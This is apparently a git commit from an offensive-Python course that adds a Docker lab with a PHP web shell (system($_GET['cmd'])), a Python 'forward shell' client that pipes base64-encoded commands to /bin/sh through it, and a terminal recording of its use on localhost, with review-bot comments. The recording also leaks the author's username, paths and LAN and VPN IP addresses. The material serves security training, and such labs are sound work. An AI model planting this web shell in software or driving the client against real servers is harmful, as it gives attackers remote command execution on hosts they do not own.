2024-02-02 23:02:37 +01:00
parent 0d95645a93
commit 5d7e3302c5
4 changed files with 230 additions and 0 deletions


@@ -0,0 +1,5 @@
FROM php:7.0-apache
COPY index.php /var/www/html/
EXPOSE 80
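Review bot: The base image on the `FROM php:7.0-apache` line is a PHP branch that no longer receives security fixes, and nothing in the file says that this container is a deliberately vulnerable lab target. Add a leading comment such as `# Intentionally vulnerable lab image: run only on a local, isolated Docker host`. Also document publishing the port on loopback only, for example `docker run -p 127.0.0.1:80:80 <image>`, so the endpoint served from `index.php` is not reachable from the LAN.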


@@ -0,0 +1,5 @@
<?php
system($_GET['cmd']);
?>
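Review bot: `system($_GET['cmd']);` hands a request parameter straight to the shell with no authentication or filtering, so anyone who can reach the container's port 80 runs commands as the web-server user (the session log in this commit shows `www-data`). If this is the intended lab target, say so at the top of the file, e.g. `// Intentionally vulnerable lab target: never deploy outside the local test container.` Because the parameter travels in the query string, each request should also appear in the web server's access log, which is useful to point out for anyone using the lab to practise detection.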


@@ -0,0 +1,51 @@
#!/usr/bin/env python3
"""
Forward Shell
Comandos para reverse shell:
https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
mkfifo input; tail -f input | /bin/sh 2>&1 > output
"""
import requests
import signal
import sys
from termcolor import colored
from base64 import b64encode
def def_handler(sig, frame):
print(colored("\n[!] Exiting...", "blue"))
sys.exit(1)
signal.signal(signal.SIGINT, def_handler)
main_url = "http://localhost/index.php"
def run_command(command):
command = b64encode(command.encode()).decode()
data = {
'cmd': 'echo "%s" | base64 -d | /bin/sh' % command
}
r = requests.get(main_url, params=data)
return r.text
if __name__ == '__main__':
while True:
command = input(colored("> ", "yellow"))
output_command = run_command(command)
print(output_command)
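Review bot: `requests.get(main_url, params=data)` in `run_command` has no timeout, so a remote command that waits on stdin blocks the client until it is interrupted; the recorded session in this commit shows exactly that after a bare `cat`, ending in a `KeyboardInterrupt` traceback inside `requests`. Pass a timeout and handle the failure, e.g. `r = requests.get(main_url, params=data, timeout=10)` inside a `try`/`except requests.exceptions.RequestException`. The module docstring is also worth tightening: it is titled Forward Shell but links reverse-shell material and quotes an `mkfifo` line that the code never uses. The rendered page has dropped the file's indentation, so the block structure is inferred here.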


@@ -0,0 +1,169 @@
Script started on 2024-02-02 18:20:04+01:00 [TERM="xterm-256color" TTY="/dev/pts/1" COLUMNS="106" LINES="53"]


7🐧 ~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs at ⚡ 18:20:04
 [?2004h[?25l8]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs]1;..hacking/12_fs]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs\%


🐧 ~/Doc/p/gi/p/curso-python/python-ofensivo/15_hacking/12_fs on ☕ main ?1  🔒 ES at ⚡ 18:20:04
 [?1h=[?25h[?2004h[?25l

🐧 ~/Doc/p/gi/p/curso-python/python-ofensivo/15_hacking/12_fs on ☕ main ?1  🔒 ES vpn at ⚡ 18:20:04
 🏠 192.168.1.115[?25h[?25l

🐧 ~/Doc/p/gi/p/curso-python/python-ofensivo/15_hacking/12_fs on ☕ main ?1  🔒 ES vpn at ⚡ 18:20:04
 🏠 192.168.1.115 📡 192.145.39.55[?25hscriptscript/[?1l>[?25l[?2004l
 script/[?25h
]2;script/]1;script/%
]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\

🐧 ~/Doc/p/gi/p/curso-python/python-o/15_hacking/12_fs/script on ☕ main ?1  🔒 ES vpn at ⚡ 18:20:09
 🏠 192.168.1.115 📡 192.145.39.55[?1h=[?2004h##!#!//uussrr//bbiinn//eennvv  ppyytthhoonn3[?1l>[?25l[?2004l
 #!/usr/bin/env python3[?25h
%
]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\

🐧 ~/Doc/p/gi/p/curso-python/python-o/15_hacking/12_fs/script on ☕ main ?1  🔒 ES vpn at ⚡ 18:20:30
 🏠 192.168.1.115 📡 192.145.39.55[?1h=[?2004hccurl -s -X GET 'http://localhost/' -G --data-urlencode 'cmd=cat /etc/resolv.conf 2>&1'co🏠 192.168.1.115 📡 192.145.39.55de index.htmlcoddd           d e index.htmlcode f         irmaMail-Prefapp.htmlo                    rwat rdshell.py[?1l>[?25l[?2004l
 code forwardshell.py[?25h
]2;code forwardshell.py]1;code%
]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\

🐧 ~/Doc/p/gi/p/curso-python/python-o/15_hacking/12_fs/script on ☕ main ?1  🔒 ES vpn at ⚡ 18:20:44
 🏠 192.168.1.115 📡 192.145.39.55[?1h=[?2004hppyinstaller --noconsole --onefile backdoor.pypy                                           listener.pyf          irefox_decrypt.pyfo                orrwardshell.py  [?1l>[?25l[?2004l
 py forwardshell.py[?25h
]2;python3 forwardshell.py]1;pywww-data
%
]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\

🐧 ~/Doc/p/gi/p/curso-python/python-o/15_hacking/12_fs/script on ☕ main ?1  🔒 ES vpn at ⚡ 18:23:42
 🏠 192.168.1.115 📡 192.145.39.55[?1h=[?2004hpy forwardshell.py[?1l>[?25l[?2004l
 py forwardshell.py[?25h
]2;python3 forwardshell.py]1;py> cat
/
^CTraceback (most recent call last):
File "/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/forwardshell.py", line 23, in <module>
output_command = run_command(command)
File "/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/forwardshell.py", line 14, in run_command
r = requests.get(main_url, params=data)
File "/home/v/.local/lib/python3.10/site-packages/requests/api.py", line 73, in get
return request("get", url, params=params, **kwargs)
File "/home/v/.local/lib/python3.10/site-packages/requests/api.py", line 59, in request
return session.request(method=method, url=url, **kwargs)
File "/home/v/.local/lib/python3.10/site-packages/requests/sessions.py", line 587, in request
resp = self.send(prep, **send_kwargs)
File "/home/v/.local/lib/python3.10/site-packages/requests/sessions.py", line 701, in send
r = adapter.send(request, **kwargs)
File "/home/v/.local/lib/python3.10/site-packages/requests/adapters.py", line 489, in send
resp = conn.urlopen(
File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 700, in urlopen
httplib_response = self._make_request(
File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 446, in _make_request
six.raise_from(e, None)
File "<string>", line 3, in raise_from
File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 441, in _make_request
httplib_response = conn.getresponse()
File "/usr/lib/python3.10/http/client.py", line 1375, in getresponse
response.begin()
File "/usr/lib/python3.10/http/client.py", line 318, in begin
version, status, reason = self._read_status()
File "/usr/lib/python3.10/http/client.py", line 279, in _read_status
line = str(self.fp.readline(_MAXLINE + 1), "iso-8859-1")
File "/usr/lib/python3.10/socket.py", line 705, in readinto
return self._sock.recv_into(b)
KeyboardInterrupt
%
]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\

🐧 ~/Doc/p/gi/p/curso-python/python-o/15/12/script on ☕ main ?1
 🏠 192.168.1.115 📡 192.145.39.55[?1h=[?2004hpy forwardshell.py[?1l>[?25l[?2004l
 py forwardshell.py[?25h
]2;python3 forwardshell.py]1;py> whoami
www-data
> cat /etc/hosts
127.0.0.1 localhost
::1 localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
172.17.0.2 2f2f81768a05
> pwd
/var/www/html
> ^C
[!] Exiting...
%
]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\

🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕ main ?1 took 7m 18s 🔒 ES vpn at ⚡ 18:34:09
 🏠 192.168.1.112 📡 192.145.39.55[?1h=[?2004h[?25l

🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕ main ?1 took 7m 18s 🔒 ES vpn at ⚡ 18:34:09
 🏠 192.168.1.112 📡 192.145.39.54[?25hpy forwardshell.py[?1l>[?25l[?2004l
 py forwardshell.py[?25h
]2;python3 forwardshell.py]1;py> exit
> exit
> ^C
[!] Exiting...
%
]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\

🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕ main ?1 took 6s 🔒 ES vpn at ⚡ 18:35:25
 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hpy forwardshell.py[?1l>[?25l[?2004l
 py forwardshell.py[?25h
]2;python3 forwardshell.py]1;py> exit
> exit
> ^C
[!] Exiting...
%
]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\

🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕ main ?1 took 10s 🔒 ES vpn at ⚡ 18:36:02
 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hpy forwardshell.py[?1l>[?25l[?2004l
 py forwardshell.py[?25h
]2;python3 forwardshell.py]1;py> exit
> ls
index.php
> e ^C
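Review bot: This committed terminal recording discloses details of the author's workstation: the prompt lines and window-title escapes carry the local username and hostname, the full home-directory path, private LAN addresses and the public VPN exit address. A `script` typescript is also raw terminal output full of control sequences, which makes it hard to read in a diff. Consider removing the file from the repository and its history, or replacing it with a short, sanitised excerpt of the lab commands and their output, and add the recording to `.gitignore`.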